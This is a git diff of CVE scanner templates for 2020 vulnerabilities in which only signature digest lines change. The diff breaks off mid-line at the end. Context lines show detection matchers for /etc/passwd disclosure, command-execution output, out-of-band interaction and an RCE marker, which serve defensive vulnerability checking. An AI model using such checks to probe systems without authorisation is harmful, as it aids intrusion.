4a0a00473045022100ee51bee07a4f441a0911b5ba442f581c54e98a89e717a1484527e1375fb6d17502206eb8d9de8db97fee1dfb9a5b6a67322d79c95b6c09bde85b3167fed33c6128b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index c2dc3085192..2be816acd00 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100989ea7c32eae213e0bd6f74d487a557ee67e22e21d464ec0b5c92bfb7416a6e1022100e3ee7dbd9764d5437064d878285f454de37a7e51683ca284298068f9a2de6d2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220114bee188c930b9b09098457db3324c3cd61eefd5cc4c53c55aae854b4bfcd6d022043a55d9f1f2a3ad25f3e56c80f9e4613ad0d77644ee0cb3bbff288a4e3a1178b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index 42d5056cd85..289b00328ce 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100a223a7059e24680a013a29a396e7e0fcbf20994ae2fb9b6c1cfa4054256eaa81022065308c3d5d7879528c8e99056d1d38e35894ee681d605b6f26e9f1103a019dd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072f531b3a30081ec27821fc7508a364f3b1fa9ec8bfc4d5d483fe4654d8ff65f022026c85f616be0e34174eed94e6f21fe2c092d82fda58d1b5aa77795de8a9f7bad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10987.yaml b/http/cves/2020/CVE-2020-10987.yaml index d24fbfdf4bd..d6d3baf1164 100644 --- a/http/cves/2020/CVE-2020-10987.yaml +++ b/http/cves/2020/CVE-2020-10987.yaml @@ -63,4 +63,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4a0a00473045022100dda9d8005cba4fbfb732ae46a850b060f8687a35a6229a27dd45e2326ee681f0022050242e38f4519483ad03b3556c5a8cbf2311a24514d912c8765fb8a9013359ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210090b17c8628409f62f9770391dff5ddea670a7e95ae8b028f47f2f0202fc95a8c02210090ad08922c054e51d15a576fcebdf6c3a59ab0687d32ef456e00a2aa467b845c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 37b6c4fb584..a72d840f4d9 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -46,4 +46,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4a0a00473045022100f26e90cf7c635ee182179b7821ca87909af76560d5b8aeab1263707a70c1eda002200a61d506458b2f6ebf61e2eebdf5e143d98d4a14862f2510590a0f926ddb3be6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b5f77679ba2dd00d7354acc1aa1b0c75bfa87d1e986a1935569573eda29460c022022c3639235da746dfd24d46eadcafb202de87096b6c2b895bdcc19bde0260635:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11441.yaml b/http/cves/2020/CVE-2020-11441.yaml index 8718488d1f6..3cde336723f 100644 --- a/http/cves/2020/CVE-2020-11441.yaml +++ b/http/cves/2020/CVE-2020-11441.yaml @@ -69,4 +69,4 @@ http: regex: - 'name="token" value="([a-z0-9]+)"' internal: true -# digest: 490a0046304402205cfb432e296579004048ff057af1c0a4c93302a291ef998ee81eaf25421e358b02201ba93ed2f422c7d3ed34b0e25713bac2f359e7e14926511fff18564224112312:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc40d17ece90f900295a3b0abbf2ef5ce9723099f8a0f6729bbe52a3c016f2dc022062fafcb7b4ec84097546d43c6788db86698dfdb248345dbb8382e050a69a2c9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11515.yaml b/http/cves/2020/CVE-2020-11515.yaml index 6c748ef64ba..3eed79dc219 100644 --- a/http/cves/2020/CVE-2020-11515.yaml +++ b/http/cves/2020/CVE-2020-11515.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type, "application/json")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100a5be5a7c28bd23153720129fdf7bdfbef5f3b501556904aade1b3977f04c845302204a62ed39e50b25c85cdc04b2faf7e99a0dc378e78245a6b08e2cab9c872ba150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ffbbf2948d5815e02e41a6501f554bcecbd78bfd29ee2f7d9f0062d1dfe48e82022062a9e5193859f23aa66459355e2392d6d7940f63915ee7b677ae62120152426b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index 633f1217e8e..2f4bedcacf5 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220276c99cf0bb6e16849b53666c6018be5f714fbb811daaf404bf43415a7f6a83f022100b64c3fed2de4317c2d13b7fcc703c9c3f574a76ad2f807a6fdbdb22668b61508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023642deccbe01f16ab23f75d1fdf3193acff4cca8f9027ef35410a52d9a138dd02205618d9b9f92f21c20a931de07d55ec9cb4394549b8a54988d122b7fbbb0097f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 6d22329770e..ba56c06e79a 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204062cfecec08ca5737951916d9984d9d85059864b6b339e995e31ade7d688f0b022100a98ae506ead1c12579fcccac15c7aa239718b73cd29d51642cf3217fd98fb3b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d13b04f6f42e2d8dcf4235114faf29135a5f96120876199c0224e0ae7ca7e433022100aa52e33596287bbff045243b5f35c981805db9a054cfb9ada55513e65091b8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 886b18483c3..451c9e1849c 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cb5e32689714038867112e2b40456d0c402e5a87c39aba28d284a4ece6c9087c022100fcf2e848c172a77c86c3e1cd42b148522c3c94dba0346736281c00f9cbd34c3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207312d3d5be7446e5213ec03c00cd46e7fd9dbae3945e91df54ab40f1a1bc870d022076445f8a4131df26c8100125e088028f2491d5ef5c5f43c412eb2281bbc8e2dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index e3c2f06458c..4fad1bddee2 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e4e8f63e317a333643f9b85ba42f40297f9187cfd40db4c33f315d7c08f27469022100aabea0850ebee20647dd94d5118c2d2c8856b8216e997ffe940c8e7840e0b33e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3416181b9781e592cc2686d6ed6bf0eb43adcecc270b55b2fafcfcd87a883100220356fe62003d4ab431c41fc34c60d6fed4ad69ad58deb74a01ee8602ac33d1329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11975.yaml b/http/cves/2020/CVE-2020-11975.yaml index 7f6546e8ed7..f34ae6e04ae 100644 --- a/http/cves/2020/CVE-2020-11975.yaml +++ b/http/cves/2020/CVE-2020-11975.yaml @@ -81,4 +81,4 @@ http: - 'contains(content_type, "application/json")' - 'status_code == 200 || status_code == 500' condition: and -# digest: 4a0a00473045022100bfe31eef6f60de8d41a3389d3d38610bcbdb29ec2ef19b86eac7d695496cfb900220166cebf19cab012beb1da40e4e6819b471f3b4467ecbc6f9170ceedda70bc961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207e52c0e863e05745ad4f6d4befac895b920153a1e5262b188745f1ffeb9ebc79022100c44b1780e708403d6f9712bcbac82400affcf9a93c9cce932a4f736d70d9eed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index ea7595bc1a1..8497cabe96f 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202b47e140d4ed1f628b2a9eb10f3fc846c31fb2b019724c0ff7eaf83b70af3d430220485191eba3d271fbedc6ff0c472817da862e4436f1490955d2f21bea74343c5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009332db7db3adfc54c114a741640cb907d19620623982fb16ac8f64c5c011d449022100c6d337a89020a2422f744337135ee057c8369e28f3aa0f8a07a14565a5374e6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 6ffc970982a..ad1c8a3baa3 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210097e3ac65b3cca67e282aa73c079ee6dd4b4c0c4a0b933e6858eb29af2eb4b8f5022100cc17ac1d61e750d263b41f518fe42cdd7783ec51844f6a794a1cb6b29252b147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecaf0f8a8f5d3ca86aec55f446428e5c062da0e84dbeea90cbe1a16b50230dd5022001d154440da53473df22c1a2f457d64acf5281b94ed19c50b8ebbe3ec557e2f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index b1c4b0c22d8..34e6e6d09b4 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -59,4 +59,4 @@ http: - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - 'contains(content_type_3, "text/html")' condition: and -# digest: 490a00463044022039d02f5c095e1a8d48c10b875c84b17eea1ac299a6efeed384e718a21a4d2981022056ae68d14fb98fd10e88da6eaa7b3ed78c2214eddc5d86be2865ee0407b6fa89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220664f58c74c54b6cb7081746b1f789cc10339b5148b9bb2ac7ad7bc26faed7d9102204992a02dd87cfae17ae64f1c5db8ac2d32cc47f6deef2ea5e7dcc67b2f687da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12262.yaml b/http/cves/2020/CVE-2020-12262.yaml index 72d1706d032..b47620a5bcb 100644 --- a/http/cves/2020/CVE-2020-12262.yaml +++ b/http/cves/2020/CVE-2020-12262.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210093915ab8510a0d065605ae28f606408de8a8610606134173d161bcc0ec1f59fa022100aa7a68b6bc7009dd6ec0c6e38693b0d85cbb27787a9ee97da8ab549cdb209f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f599d33249afb93df2043aa048fbfaa7dc9d2e59aee4200f659f92b0f352d72402205d01c65aea27e30bfd97c0ffd9c1446b6f59af18dd90859e15f12f2d65bd6416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 982fbe91780..02255a0d3a6 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -55,4 +55,4 @@ http: - type: word words: - "vbulletinrce" -# digest: 4b0a00483046022100f3eff9960b60fa07c87af51ea348d182b5f944ecad0f1a8b11fa32534e1e4fa9022100d63de8255c6f94e03866d3563039d3b7a6154269c577199224db0ecdb2a4cf5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200173a1b63f10760cfbfb475b4f48f90bdc052dd0aed58049d3621963ca314c55022100d3cf4c586f4a5e8b8b1b17a6b1c6fd7042bd9974a6cb779761b1e93c3c5337b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12832.yaml b/http/cves/2020/CVE-2020-12832.yaml index e3ea5ee051f..fc6206d23e1 100644 --- a/http/cves/2020/CVE-2020-12832.yaml +++ b/http/cves/2020/CVE-2020-12832.yaml @@ -111,4 +111,4 @@ http: - 'status_code == 200' - 'contains_all(body, "{{rand}}")' condition: and -# digest: 4a0a00473045022022778e612e609894218c6f507a775a71a1b21e0994c6bc17bd435c8a29c22a7702210086951e077d3448326dd33402f3df5896cb962913c062b2288b6790100341556e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d3759f8fff7a78f51782fcb8c48bd2a10143cf5e57c49e4b8e52267833e26c220221008e4059ff9205cf57d171ace8de95a77a1f258c0b1d1bc1fd16e0b831cf0f4653:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 5e0b3476eee..d417b5bbe7d 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a004630440220616599bbb895318a5c7a3958c4ccc1366877a6d78ce2f8c4e65a4c5f4da1886f02201fabd64ebfe7b86b4b01fa3589109ae7422ec0cab3cc7db14dafae292d9cebb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f89125d5270d541f8813d9ed4a64548a475b6c344357fe2e7c45a033dd5de5b0220341f685ca105c405a3d4cc669e8e5acaadaea63212d62b57baef839fb83003cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13125.yaml b/http/cves/2020/CVE-2020-13125.yaml index 905933995ee..5959927c6d8 100644 --- a/http/cves/2020/CVE-2020-13125.yaml +++ b/http/cves/2020/CVE-2020-13125.yaml @@ -107,4 +107,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205976e5e4ef632c9618b1df91913d46135f278f232f44a566232005274aefc0af0221008354b8cde8d960b300992f5ee959b5564434b78102bfa60b206c95b05b3695e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c682c1d34e5ba76479f35d867de3c49085f02dd481a1258cbc69a93aa2b620ab02210084bea2d05fc0d8275637dbae1f3c5a56c37eb84d23575657efc0a3ce9cc8b33b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index 3089022fe6e..99ad01e697f 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009264410f7531d029f20d14be9aeab2ed247ea2f30fc421d94e0ea9504a1d7286022100cccdbc3ffddf5e3c9e8c2d6e3cdb9f07748642e6bf52f593425f5b19889299a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a4d09d13a331f4f8c0f996606e96f7ea28f3f38975fa5114f45565276ea49f1b022100922e66f656ba22f1b5052801d3fb47b70730ce925dc57b4a1c55fac91d9d3674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 7d2e5bf45bd..b60a87e3da6 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022016b127494cb0d59bda36b8b1e9d5c7fbc9adb91d8ee01a9fd330113847506f2f022100d8acefe61523a8891074c225ada5b1dbf560e39b4e9f5b8a78bf257e1084d396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c7f69e1e76e15a533eb0d5c2ba09f90797213e79977d8dbdfada306870699d80220298d37a033235e5d9b6472a9bd2df5f72dfe18c37df114667c9f0b787c633d52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 7b3e239c734..906a2cec1d6 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cc31bed473f0a015197c6bebfaa0891f1b21d3642a6fb383834f6d7a4dee5563022100f8ce8e6ae3e944bd3bcd6fdc494416df617c2b5a2590e3ad6ccbdeeb25bc7b6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086d80c75811288b4ea8e324f65c02fe8b97f42ab79484cff34eff5e46a5a1e1a02205002c9ddf112245e7aeca3c569c878a11670608733e63a6a63ed94642033fb3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 07274808557..feeb32c5d70 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f2a1cab32156d33322f9202feb8d207ffdfabc37531537b1c886b0599991ab30022100b622cbd4c69718feaac269a19f679d93b906bdd04b8c5e028d6ee677ae915be9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db7b59bf651f1132045f4a939f90717b0431e5023fd682bafef5a90ca656c40c022100b9d1364d8056a579a8d0b8cecba63328372435a3d1595b3b1c9ab4365b8cc6f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index ff2587403c1..c055d0c6563 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -61,4 +61,4 @@ http: - 'status_code==200' - 'contains(header,"text/html")' condition: and -# digest: 4a0a004730450221008da7da7ed54c7903f429c9b660b5fc529e3a59668487af89706ec4f1dcccf72d0220073f9131cba490ca1fc74a2b3629893bf1286d0b6f526e31f6c9cb651d65a034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200681e6e032e51c5b3ca77bd3d5d2e2a262d1b02cf5af4439debd94011970dfc3022100fdbf9c0c8b23d59a353a397414c5361203a79bd1a3490fbdeee21b340409403a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index b3869bf61e6..214ee0cd76f 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220608302a25d52bba7ac4e912386efa6283ab3d01a75341149be800345b81a70a20221009f73bce63a196f6fc0b3478d19bda5a5ee2b73d4d1721b238713af5e88d7e28c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f14481166c60e2a432a701bab646a63b92aa5d76f98db9f8129b2a01918046602206c5aef6c182e6ec2bbe53a21530b43815d8266fc17945092e26043946983604f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index b05dcd155bf..8a9b98becaf 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c222342bc71a62096ec59df1d8834e0b3357cb70654a6001f32714fe816b751302204e7905c961de14d8b5b9928be6a1c2c66e0b30549da9b821f9f7caebb37865e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b55691a18f85a65b5ce9bc33e198e2091fdf3774a3df80be168f55726d36901022100ebe940945ae6a7130e1b43bba88bdafa52a5a8102732351fc8d5a5443a5f3551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13886.yaml b/http/cves/2020/CVE-2020-13886.yaml index bb665b706e3..509b4fea14e 100644 --- a/http/cves/2020/CVE-2020-13886.yaml +++ b/http/cves/2020/CVE-2020-13886.yaml @@ -40,4 +40,4 @@ http: - "regex('root:.*:0:0:', body)" - "status_code == 200" condition: and -# digest: 4a0a00473045022054fa3c8548c63d18dc994472008529467a9e980f531f1d86adcc3f1f77c2e45e0221009bf8dcf4c34141795526f23af07d790f3b775479f3277edc5aa8de76719ead89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023d341eef061603802f49174d269d23eb1d9333bd1a455a74b339fb6ffab834d022047ab50ff5d75b8a558563667cc8c8f2b042be5509d9972839a5b0b41bab1c1ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index da60549d1e4..23246feaefe 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -56,4 +56,4 @@ http: - '"dag_id":' - '"items":' condition: and -# digest: 4a0a00473045022100a8c7b812e42c4088db20784ee9a1f2a2f23388735b4612e1184d9cb4429d04b902205b08afddf633970d9831b5f66be8da2903ac24f2b0c1869c6ee64ae18ebc1fd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b356611e417a8c742ef2f1ed809937c9839f36728df3466ff3fdba928d5647e1022100ab173423165b7df5472f0f41784181683fedd5f56f8277bea23c5bb38ea6d622:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 5eee0ed3e3d..3937948b07c 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205a9b505d9edfd4ad7455eed9a992cd7aa4fbb259c2a2b7620ed3a27e2e40eae50220507975476b35d03514b5d239c99f405e6106328c2f7a50cd2b373544ab21bf27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008784f1562cb08bc122f774812043a211a355ea77f1982945b892a68df9a05bdc0220294bb6fc33a613a1d422f28e0efe0cd7e6bade0f18b897f769d3bca4ae01864b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 3de6958ae65..b4c8bf73c6b 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -71,4 +71,4 @@ http: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# digest: 490a0046304402207bbc238b9e75b88d125da6945cfeab1a62321375a7051a561ac44023cbda49070220095de4812d072c36e4d062f08750b25e5d116eca8072915f890f696e366ca7c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba41559025df65113c42b15ca277843bb6018bdc7e6c97095731637cf35ba5de022100d188e2bab3710ba009a976254773e174b828907b69e2c951d01e3bacc8c121a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index e347646085f..cc660b18c40 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aa4d3d8da6a8ac4810baaf42a0d21e0ede5d956d6ee1bc2d4859721a855196d2022100c0c22ab25d38f4a8a7ab9041d54a18693b778a80e126b8c7ee9cb98414c47b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100879ed0e0511f38779f371b41b2717d307038f290ecf6a3b012b20f186c8f8f0802206ce50552a5c58b17dde0bb1640c43c37dfe9459242f6188ecca016485d0bff4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 75f90df9344..84d64a20de1 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c27d4316eae7c5ec8cedce4f541b5df541ccce5d87222ef3b9c6133f4499b21b022100c15211348c3bce915ea5b971c42d3a3198c14cec93bf0bca1a2ee318f1625d42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202eff014ca71334af595cf865093d17ab3397a100655250b55089e87b26f2a67d022036a38e1957fe553a848f79060aa05f1dbfef2f53d70294eb16bf58f333cc46fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index d40d03fbcb7..ca7e4ca3204 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b06a722c844a241c050097a66d758dfd5c3fb94cc6b9cc66db579f99ba513f7e02202cb7e7ecf4d61ffffa3bf14d050b6bfd124bc1ce050af11d9230185bc8600308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e39312cfd2ae7600c523d817b52eda2f10c32e110d5c41b741cf1c2f1ab3878c0221008c09c6064411e00e1308a427f8f261d7c8a76680cd932599d71e9f3a7ad33e19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 57513f626b8..803b914e2d7 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d54884f909c56bf3ac594b5ab6dd9aa92cea76f07bf3b7c6350b4a22a3691a2022100e1ef0f5df22c729ac20aedd5c76b360354af5a9d702d1be38bb39eeff9efff78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009145ec6d825cfaa364144c1350a74b7d67b3a3e26b151497380f15c9472ab68202202ce9c314e97408bbac9d984fd712984a9eb4bb4756a19006deb483f9dd2dfc82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 6ba7f0ee32c..0abeb5de591 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b2dd04608e6113ef360c0ec2706308a66029d1e655f3a7cc56402f8535bc33ac022077ef5e34fba5debb375442eaa895c9cbf894216a5daeb2205b347ba152d82dad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a46ff2cc8ebe8e53f2f32f940eb8b2742e09ed303dee780521a7b20805f4a160221008b8d3211cf3eecfacd05c930a1bab8098df6dffcc58914264fb572c65a7340fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 9b23f5f95f4..75973a82e57 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 